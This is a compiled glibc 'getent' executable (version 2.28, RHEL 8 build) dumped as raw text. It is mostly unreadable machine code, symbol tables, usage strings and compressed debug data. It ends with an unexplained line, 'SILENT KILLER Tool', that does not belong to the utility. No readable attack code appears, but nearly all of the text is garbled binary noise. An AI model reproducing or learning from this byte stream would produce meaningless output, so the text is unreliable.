j]!��U[� ��+�jI�J:���f�Su7������y��E� �'�y�g�"R����q >�q ��q c!�q 4�j xq libc.so.6setrpcentgetrpcbynamesetgrentendprotoentsetlocalestrncmpgetpwentputgrentsetserventgetrpcbynumbergetnetbyaddrgetpwuidfputc_unlockedgetprotobynumberinet_ntoasetspentendaliasentgetgrgiderrorinet_ntopgetgrentendnetent__stack_chk_failputspentgetrpcentargp_program_version_hook_libc_intl_domainnameether_aton__dcgettextsetsgentinet_ptongetnetbynameputsgentendpwentstrtolendnetgrentgetspent__nss_configure_lookupether_ntoagetpwnamstrlengetaliasbynamegetaddrinfo__errno_locationgetsgentendgrentsetprotoentgetgrnamendrpcentstdoutgethostbyaddrargp_helpinet_addrendhostentfclosestrtoulendspentgethostentgetspnam__ctype_b_locgetservbynamestderrendsgentgetprotoent__libc_dynarray_resizeopen_memstreamgetsgnamsethostentfwritesetnetentether_hosttontextdomainether_ntohoststrchrgetaliasentfprintfprogram_invocation_short_namegethostbyname2argp_parse__cxa_finalizefreeaddrinfosetaliasentinnetgrgetprotobynameendserventgetnetgrentmtracegetgroupliststrcmp__libc_start_mainsetpwentgetservbyportgetnetentsnprintf__overflowsetnetgrentgetserventfputs_unlockedputpwentfree__prognameGLIBC_2.3GLIBC_2.4GLIBC_2.10GLIBC_PRIVATEGLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableii
�ii
�������c	�ui	��i 05�i �4j j  j �R0j S@j 0UPj Spj S p �R(p `O0p �R8p @O@p �RHp  OPp �RXp @L`p "Rhp �Jpp �Qxp �I�p �R�p �H�p �R�p pG�p R�p @E�p �Q�p �8�p �R�p D�p �R�p �B�p �R�p �A�p �R�p �@q �Rq �?q �Rq ?@q  j Hq �OPq �UXq `Uhq =xq @5�o �o +�o 8�o Z�o a�j i�q g�q f�q e�l �l �l �l �l �l m m m 	m 
 m (m 
0m 8m @m Hm Pm Xm `m hm pm xm �m �m �m �m �m �m �m �m �m  �m !�m "�m #�m $�m %�m &�m 'n (n )n *n , n -(n .0n /8n 0@n 1Hn 2Pn 3Xn 4`n 5hn 6pn 7xn 9�n :�n ;�n <�n =�n >�n ?�n @�n A�n B�n C�n D�n E�n F�n G�n H�n Io Jo Ko Lo M o N(o O0o P8o Q@o RHo SPo TXo U`o Vho Wpo Xxo Y�o [�o \�o ]�o ^�o _�o `�o a�o b�o c�o d��H��H�AI H��t��H����5
F �%F ��h�������h��������h�������h�������h�������h�������h�������h��q������h��a������h	��Q������h
��A������h��1������h��!������h
��������h��������h������h�������h��������h�������h�������h�������h�������h�������h��q������h��a������h��Q������h��A������h��1������h��!������h��������h��������h������h �������h!��������h"�������h#�������h$�������h%�������h&�������h'��q������h(��a������h)��Q������h*��A������h+��1������h,��!������h-��������h.��������h/������h0�������h1��������h2�������h3�������h4�������h5�������h6�������h7��q������h8��a������h9��Q������h:��A������h;��1������h<��!������h=��������h>��������h?������h@�������hA��������hB�������hC�������hD�������hE�������hF�������hG��q������hH��a������hI��Q������hJ��A������hK��1������hL��!������hM��������hN��������hO������hP�������hQ��������hR�������hS�������hT�������hU�������hV�������hW��q������hX��a������hY��Q������hZ��A������h[��1������h\��!������h]��������h^��������h_�������%@ D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%�? D���%}? D���%u? D���%m? D���%e? D���%]? D���%U? D���%M? D���%E? D���%=? D���%5? D���%-? D���%%? D���%? D���%? D���%
? D���%? D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%�> D���%}> D���%u> D���%m> D���%e> D���%]> D���%U> D���%M> D���%E> D���%=> D���%5> D���%-> D���%%> D���%> D���%> D���%
> D���%> D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%�= D���%}= D���%u= D���%m= D���%e= D���%]= D���%U= D���%M= D���%E= D���%== D���%5= D���%-= D���%%= D���%= D���%= D���%
= D��AWAVAUI��ATA��USH��(dH�%(H�D$1����H�5�����H�=�7 ���D��E1�L�D$1�L��H�=> �*���HcD$A)�E����H�5�< H��I�l�H�L$H��taD�uH��< E1��f.�H��H�s�A��H��t5D:6u�H��������u�H�D$Mc�A�|$�I��I�tH�q< B�T8�P�H�5�H�=�6 �"���H�=�= H��H��1�����H�
�= H�5�= �H�=D= ����H�T$dH3%(u2H��([]A\A]A^A_�1��H�5F���1�1�H��1�����������1�I��^H��H���PTL��H�
?H�=H����Z; �H�=�< H��< H9�tH�6; H��t	�����H�=�< H�5�< H)�H��H��H��?H�H�tH�
; H��t��fD�����=�< u+UH�=�: H��tH�=�4 �i����d�����< ]������w������SH�
�1�H��H��H�5�����H�5�1����H��H��H��1��u����H�5�1����H��H����1��M���ff.�f�ATH�
�UH��SH�GH�7�WH�=�H�8H�'HD�1����H�EH�0H��t*�L�%�L��1����H�EH�4H��H��u�H�=V; H�G(H;G0sH�PH�W(�
[]A\�@[�
]A\���f�AT1�UH��S�WH�OH�7H�=f��������H�EH�8tX1�E1�f.�H�=�: H�G(H;G0s_H�PH�W(� H�EH�5�: J�< ���H�U�CH��L�$�H�<�u�H�=�: H�G(H;G0s&H�PH�W(�
[]A\�fD� ����@[�
]A\����f�AT1�UH��S�WH�7H�=W�U���H�EH�8tT1�E1�fDH�=!: H�G(H;G0s_H�PH�W(� H�EH�5: J�< ��H�U�CH��L�$�H�<�u�H�=�9 H�G(H;G0s&H�PH�W(�
[]A\�fD� �&����@[�
]A\����f�ATUH��S������H�uH�=�H��1����H�EH�8tQ1�E1�H�=Y9 H�G(H;G0s_H�PH�W(� H�EH�599 J�< �(���H�U�CH��L�$�H�<�u�H�=9 H�G(H;G0s&H�PH�W(�
[]A\�fD� �^����@[�
]A\�J���f.���AWAVAUATUSH��(dH�%(H�D$1�����I��t>1ۃ����H�L$dH3%(����H��([]A\A]A^A_�f�H�^�I�l$H�sH��M�l$H���H��H�ǹ�€�E1���ID��H�ǹL���€���ID��I�<$����uT1�H��L�-qH�����A��H�_H��I�4$M��HD�H��H�=�HD�1�H��H��1��������fDL��H��H���j���A���DH�>��������I�4$H�=�1�I��M�t$M�l$�l�H�-�L�=�5@H�L$H�T$H�=~H�4$H��HD�H��HD�H��ID�1��'�L��L��L������Å�u�H�=�6 H�G(H;G0sLH�PH�W(�
�O���f��H�54�H�=�/ �#���H�=�6 H��H��1����������
�������b�f�AVAUATUSH��@dH�%(H�D$81�H�GH�0H����I��1�I��@A�}�.L����I�UH�=�H��1��B�I�EH�8tU1�E1�H�=6 H�G(H;G0��H�PH�W(� I�EH�5�5 J�<0���I�U�CH��L�4�H�<�u�H�=�5 H�G(H;G0sRH�PH�W(�
I�E�UH��H�4�H���H���H�D$8dH3%(u,H��@[]A\A]A^�� ����q�����
�����/�ff.�@AW1�AVAUATUH��SH��H�7H�=��>�H�}����
w!��fDH�5	5 � ���4��u�H�EH��tME1�1�L�-FL�%cH�@@E�~L��H��I9�H�EM��IE�H�4�1����H�EL��I9�r�H��[]A\A]A^A_�f.���AVAUATUH��SH�� dH�%(H�D$1���t%H��H�L$dH3%(�rH�� []A\A]A^ÐH�t$H�|$���I��H��tĺH�5�H�=6- �q�L��H����L�5�2 M����L��L�-�2 1���H�D$�%fDH9���H�A1�I�D$(�
M�uI��L��L�����I�}\$H��t6�Y�Hc�I�L$(I�t$0H�H�D$H��Hw�H9�sqH�AI�D$(� �L���H�=����1��H�5����L��H��H��1���L���p��������H�D$���fD� L���k��5���fD�
L��1��Q��������H��H�5�2 ����uH����H�=�2 H�5�1�H�������ATUS��tL~i�G�H��E1�H�l��f�H��H�����H9�tH�;��H��u�H��A�H9�u�D��[]A\����	�H���X����3�H��u���E1�[]D��A\�ff.���AWAVAUATUSH��(dH�%(H�D$1��������H��L�d$����D$I�ƍE�L�l��@H��H���l���L9�tsH�+�/E1�H����H��t
�H�+L�x�
L��H�����H�;I�H�7�DrtH�T$�:uH=��vBL����H��u�H���D$L9�u�H�L$dH3%(�D$uYH��([]A\A]A^A_Ðf��L��������1�����H������;�H��u�����D$���f���AUATUSH����������H��E1���I�čE�H�l��3f.�1��
�������H��t-H��H���|�H9�t+H�;I�$H��DPu���H��u�H��A�H9�u�H��D��[]A\A]�fD1�����H��� ��;�H��u��Q�H��E1�[D��]A\A]���AUATUSH����������H��E1���I�čE�H�l��3f.�1��
�����]�H��t-H��H������H9�t+H�;I�$H��DPu���H��u�H��A�H9�u�H��D��[]A\A]�fD1������H������H��u���H��E1�[D��]A\A]�H��H�5�. ����uH����H�=�. H�5�1�H���'����AVAUATUSH��dH�%(H�D$1�������A��H��E1��$�H��A�D$�I��L�l��f�H��H���d���L9�tG�EH�;�
L���X��}H�;t�?t	H�$�:tA�\�H��u�H��A�L9�u�H�L$dH3%(D��uQH��[]A\A]A^�����Y������f�H��������H��u����E1���o�ff.�@��AUATUSH����������H��E1��w�I�čE�H�l��0f.��K�1�ȉ���H��t-H��H����H9�t+H�;I�$H��DPu���H��u�H��A�H9�u�H��D��[]A\A]Ð1�����H���8����H��u��y�H��E1�[D��]A\A]��UH�o�SH��H��H������t
H��[]�H�{H9�t�D$����D$H�kH�H�C������ff.����AWAVAUATUSH��xdH�%(H�D$h1�����L�d$ ��H���
I�D$L��H�D$ H�D$(
H�D$0�C������������C�L�t$A�����H�D�H�D$H�D$ �D$� Hct$H;t$ �`L���������H�T$0H�}L��D���<����t�H�u1�L�|$0H�=��~���~)�C�I�\�f�A�7���tH�=�1��Z�I��L9�u�H�=2+ H�G(H9G0��H�PH�W(�
H��H;l$�G���H�|$0I��L9�t�_�1��1�H�5H�=$ �@�H�=�* H��1��?��H�L$hdH3%(��H��x[]A\A]A^A_���H�5�H�=�# ���H�=�* H��
H��1�����럾
����9���f.�H�|$0I��L9�t����i�����_������@��AUATUSH��(dH�%(H�D$1��������G�H��E1�H��L�d��'��
�H���.�H��uNH��A�L9�tPH�3H��
�j����H�3H���V���~J��H�����H��t�H��H�����L9�u�H�L$dH3%(D��ucH��([]A\A]�@H�;�
��H��u�H�;����V���@1�����H���x��c�H��u����E1����ff.�@H��H�5�( �`���uH����H�=�( H�5
1�H�������ATUS��tL~i�G�H��E1�H�l��f�H��H�����H9�tH�;��H��u�H��A�H9�u�D��[]A\�����	�H���X�����H��u���E1�[]D��A\�ff.�H��H�5�' ����uH����H�=�' H�5b1�H���G����AVAUATUSH��dH�%(H�D$1�������A��H��E1��D�H��A�D$�I��L�l��f�H��H���d���L9�tG�EH�;�
L���x��}H�;t�?t	H�$�:tA���H��u�H��A�L9�u�H�L$dH3%(D��uQH��[]A\A]A^�����9������f�H��������H��u���E1����ff.�@��AWAVAUATUSH��8dH�%(H��$(1�������G�H���D$L�-�L�d�H�D$H�D$H�l$ �:�H��H��I���:���uNL��H����L��L��H��1��*�L9�t>H�;��I��H��u�L�t$H�;L������u	L�;�@H���D$L9�u�H��$(dH3%(�D$ubH��8[]A\A]A^A_�fD�H�5�H�=� ���H�=�% H�H��1�����D$�fD�D$��)�f���ATUS��tL~i�G�H��E1�H�l��f�H��H�����H9�tH�;��H��u�H��A�H9�u�D��[]A\�����	�H�����3�H��u���E1�[]D��A\�ff.�AWAVAUATUSH���dH�%(H��$�1�����5# f�H�D$0H�D$X��*H�$D$8D$H�t$0�|$4�����B�H���D$L�%�H�D�H�D$H�D$(H�D$��D$H��H9\$�	H�L$H�$1�H�;����u�L�l$(M����H��$�@A�MM��tLL�=|��t@L�=v��t4L�=n��t(L�=l��tL�=d��tL�=M��
��M�u A�}�.H��H��M��LD�I�EH�pH����HE����L��L��H�=H��1��S�M�m(M���N���L�l$(L��H���E�H9\$����f.�H��$�dH3%(�D$uzH���[]A\A]A^A_��L�|$`H���1�L�����0���1�����H�������H��u��y��D$�|����D$�o����J��f.�����H��
���������H��1��{���ff.�����H��1�1��^���ff.�����i����s��AWAVAUI���:ATL��USH������H�e  I��H����I��H�-_  E1�M)�H��u�rf�H��H�]�A��H��t_L��L��H���a����u�I�wH��Mc��n��I��H�  J�< t,H��1�[]A\A]A^A_���f��� 1���H�51�����1��H��1���@H�-� H��t�@H��L��H������H�]�H��u�����f.����AWI��AVI��AUA��ATL�%$ UH�-$ SL)�H�����H��t1��L��L��D��A��H��H9�u�H��[]A\A]A^A_�ff.������H��H���2.28(GNU libc) getent %s%s
2018Written by %s.
Thorsten Kukuk%-15s %d%s%-21s %d/%s%-21s %d%-21s %snetgroup*%-21s (%s,%s,%s) = %d
%-21s (%s,%s,%s)%-15s %s, %s: %s%sSupported databases:


initgroups %ldethers%s %s
STREAMDGRAMRAWSEQPACKETRDMDCCP%-15s %-6s %s
Unknown database namewrong number of argumentsUnknown database: %s
ahostsahostsv4ahostsv6aliasesgshadownetworkspasswdprotocolsrpcservicesserviceCONFIGno-idndisable IDN encodingCopyright (C) %s Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Enumeration not supported on %s
For bug reporting instructions, please see:
%s.
<http://www.gnu.org/software/libc/bugs.html>error writing shadow entry: %m
error writing passwd entry: %m
Could not allocate group list: %m
error writing gshadow entry: %m
error writing group entry: %m
Service configuration to be usedGet entries from administrative database.database [key ...];4%���h���������P���������p�40�l��@����4@�|��@���� �d����� �@�` �������(��d0����� ��� ����l����`����������������0��`���(	zRx�8��/D$4���FJw�?:*3$"\h��t���sE�d4�4���B�H�D �z
ABEAFB4�����B�C�D ��
ABGQFB44���B�C�D ��
ABGQFB48����B�A�D ��
ABGQFBHpT�>F�B�B �B(�A0�A8�D`J
8A0A(B BBBJ@�H�1B�B�B �A(�A0�Dp�
0A(A BBBDDD��B�D�B �B(�A0�D8�D@�8A0A(B BBB@H���F�B�B �A(�D0�DPs
0A(A BBBB�8�9DT
HT4�X��F�A�A �I
ABDcAEH���NF�B�B �B(�A0�A8�D`�
8A0A(B BBBBH0���F�B�A �A(�D0�
(D ABBGk(D DBBH|H��F�B�A �A(�D0�
(D ABBGk(D DBB���9DT
HT@���F�B�B �A(�A0�D@�
0A(A BBBIH,���F�B�A �A(�D0�
(D ABBBk(D DBB(xl�TA�J�J0M
AADL���,F�B�B �B(�A0�A8�D��
8A0A(B BBBH8���1F�B�A �A(�DP�
(A ABBE0��9DT
HT4P���F�A�A �I
ABDcAE���9DT
HT@��F�B�B �A(�A0�D@�
0A(A BBBIH���WF�B�B �B(�A0�A8�G��
8A0A(B BBBG48��F�A�A �I
ABDcAELpd�FB�B�B �B(�A0�A8�G��
8A0A(B BBBH�d��p��|�\���%X�B�B �J(�D0�A8�D@y8C0A(B BBBD������X@������L\h���F�B�B �E(�D0�A8�D`B
8A0A(B BBBAD��eF�E�E �E(�H0�H8�G@n8A0A(B BBB�0�05�4j �RsS0USiS�&
(Q�i �i 0���o� 
�l 	�h(	���o���o���o�o0���o.�j �&�&�&�&'' '0'@'P'`'p'�'�'�'�'�'�'�'�'(( (0(@(P(`(p(�(�(�(�(�(�(�(�()) )0)@)P)`)p)�)�)�)�)�)�)�)�)** *0*@*P*`*p*�*�*�*�*�*�*�*�*++ +0+@+P+`+p+�+�+�+�+�+�+�+�+,, ,0,@,P,`,p,�,�,�,�,��R`O�R@O�R O�R@L"R�J�Q�I�R�H�RpGR@E�Q�8�RD�R�B�R�A�R�@�R�?�R? j �O�U`U=@5GA$3a1�&4GA$3p1113�2�PGA*GA$annobin gcc 8.5.0 20210514GA$plugin name: gcc-annobinGA$running gcc 8.5.0 20210514GA*GA*GA!
GA*FORTIFY�GA+GLIBCXX_ASSERTIONSGA*GOW*GA*cf_protectionGA+omit_frame_pointerGA+stack_clashGA!stack_realignGA$3a1�45QGA$3p1113�P%QGA*GA$annobin gcc 8.5.0 20210514GA$plugin name: gcc-annobinGA$running gcc 8.5.0 20210514GA*GA*GA!
GA*FORTIFYGA+GLIBCXX_ASSERTIONSGA*GOW*GA*cf_protectionGA+omit_frame_pointerGA+stack_clashGA!stack_realign
GA*FORTIFY�@5�PGA+GLIBCXX_ASSERTIONSGA+GLIBCXX_ASSERTIONS�PQ
GA*FORTIFYgetent-2.28-251.el8_10.25.x86_64.debug��@M�7zXZ�ִF!t/��_�]?�E�h=��ڊ�2N�a���em��P<_��hmE�/�[]��	��rĞx�S�<�1�(�Ǽ��y�dW�bk�Zz���Gl���4X�Y]�s��A~	�&�{���:����l�]`���ό>���a�DɃH�!	��m���ݧ�+/�ɫ�2v3��w[e�G x��O'~W��(;K�w��xoW�(b��+/��tv'�
�4l�<��i��f���%p$��A8i&�u���h,d#��4,���9�K����Ќ��:P�vɏ5�v*[{�t�c_+8X��U���D��o��s�j��3�H
1�?h��S	
�,(	�i��� '�)�W��=+Y���-&�-%�-��w�x9
q�;�t�똄�L'Y��K�I�׋U�WA�y�h��?VoP��Y?�xU��fQ�g�V����Lq��� ������kKs��5$Jaa��'{����B5�i�	3�F\���@�7�fN����B�K�����W��6�O�j�@4����>��;]�x���G~��u /��7=I~{�
�3��KN��6Ma�{�i~W$zuGf9���:)N1�QՉ�<r	x$�2Q�3��j��8�"�?��->���\��E�-Rw�R���V�Z��}1j�3t�2��";�#�^�z���3p��C9w�YX8V�H[�Ǹ?��
+p�D�Ř���5bi�tƣ	��~L�#��xS9������3,�U���-�h�����:+[z�ȇ�<��$�_�J��J/
�̂p�
؃���x��V�CJƇ�5k�+����S����!��j����s���:�q�s+ҥ�)c-j�r�����6�'}���%X|�h��L��KrnU�
�gs4��cD�:��ڃ~���=������SN1���j��|��G�&���mB~s�^�:�p)��.��&����%U��.�L�FuV��N�4s��W0�������!7�+4�ɀ�Z՟$u�C\WAj.I�b3Vu�
���N�ț��ݚ�̃�
�
86�1Ǝ�Z�X���T�1`e�俯x$"	�N�hQɀ�{�	F��l��>��'��4}��$���`�?�|�i�����oǸL��#��&�Z�
��u�u�ò�|D�ɰ+62J�ҽ��*�������l$��$�v���KQMX�ˇQy��y]宕s]
7���8�	�(=���g�YZ.shstrtab.interp.note.gnu.property.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.data.rel.ro.dynamic.got.data.bss.gnu.build.attributes.gnu_debuglink.gnu_debugdata���� &�� 4$K00�G���o��XQ
Y  a���o00�n���o`}hh(�B��	��&�&��&�&��,�,��2�2e�(Q(Q
�@Q@Q� ��U�U4��V�V��i �i��i �i�j j� ��j �j��l �l@�p p� �q �q0 
�q`�q� v,/<v@{>

SILENT KILLER Tool